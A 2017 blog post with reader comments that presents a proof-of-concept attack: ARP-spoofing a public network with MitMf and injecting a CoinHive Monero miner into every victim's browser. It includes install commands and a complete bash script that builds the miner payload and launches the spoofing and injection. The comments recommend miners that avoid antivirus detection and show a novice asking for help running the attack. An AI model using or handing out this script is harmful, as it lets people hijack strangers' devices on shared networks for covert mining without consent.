General, Info Sec 10-October-2017 .NetRussell 18 comments

Miner In the Middle


So not to long ago I read an article that TPB was running a JS miner in visitor’s browsers when they visit to generate some extra cash. I thought it was a pretty novel idea. Why not, I’d rather give up a little CPU power instead of looking at obnoxious ads.

Then I got to thinking… I wonder how hard it would be to inject a javascript miner into a public network.

A few weeks back I started playing around with MitMf Man In the Middle Framework . Originally my goal was to inject beef hooks and eventually get a shell. I realized though that this was a futile attempt these days, so I moved on. Then I saw this javascript payload that mines monero for you and I got to thinking. It would be pretty easy to drop onto a public network, arpspoof everyone and inject a javascript miner into their browser. So I started working on the attack. I’m happy to say that I was able to proof this and here is a PoC 😀

tldr; here’s the script


Setting up The Attack:

Before you can launch your mining assault you need to first

  1. Get a monero wallet
  2. Get a CoinHive account 

Once you have your CoinHive account, navigate to settings and put your monero wallet payout address into the site. That way they can pay you your funds 😀

You’ll also need to get an API key from the site. This is also under the settings page.

You’re also going to need to install the MitMf and Twisted 15.5.0if you’re running Kali. You can either install these by hand or you can run the script I built.

To install manually:

apt-get update;

apt-get install mitmf

pip install Twisted==15.5.0

How the Attack Works:

The attack is pretty simple actually. Your attacking machine needs to connect to a network with people surfing the web on it. Once connected, you run the script I provided above. The script will create an html file that has the javascript monero miner in it and it will also link your api key into it. Once the file is built, it launches the MitMf application.

The MitMf application, once running, will first arp poison the network and tell everyone to route traffic through your machine. Next it will listen for HTTP responses. When it sees one, it will inject our payload into it. Finally the victim will execute the payload automatically, without prompt, and start mining monero for you.

That’s it!

I attempted this attack on my home network and within about 30 seconds I had 3 machines and my girlfriends phone mining monero for me lol

For the skeptics that are afraid to download the script here’s the code. It’s pretty straight forward


if [ $# -eq “3” ]     then

apt-get update -y

apt-get install mitmf -y

pip install Twisted==15.5.0

echo “<script src=””></script><script>var miner = new      CoinHive.Anonymous(‘”$1″‘);miner.start();</script>” > /root/.miner_itm.html

mitmf –inject –html-file /root/.miner_itm.html –spoof –arp –gateway $2 -i $3


echo “./ <coinhive api key> <gateway ip> <interface name>”




Now obviously it is ILLEGAL to mine on someone’s machine without their expressed permission. Also, remember that mining reduces the shelf life of your hardware. Devices weren’t designed to run at 100% for days weeks or months at a time. I just wanted to demo this fun little attack that I think we’ll see more of in the future.

If you have any questions or info on how to clean this up, please reach out to me on twitter


18 thoughts on “Miner In the Middle

  1. Many search engines and antiviruses are blocking sites with coinhive code. Better to use alternatives, like Gridcash, for example.

  2. Good post! I also like to mine monero using a javascript miner, but i’m using which is the solution that i find to make really good profit on my websites with javascript mining, since it is not recognized by any antivirus as a malware or virus.

  3. can someone please help me out here?
    i’m trying to do the coinhive miner injection
    i’m running a persistent kali linux usb. the tutorial worked once but the next time it just didn’t work,
    i have zero ideas about coding and i’m a 100% script kiddy. can anyone post an easy and simple way to understand and follow through ? the errors i keep getting in MITMf are something related to attribute headers. a reply asap would be appreciated
    just a man trying to learn.

Leave a Reply

Your email address will not be published. Required fields are marked *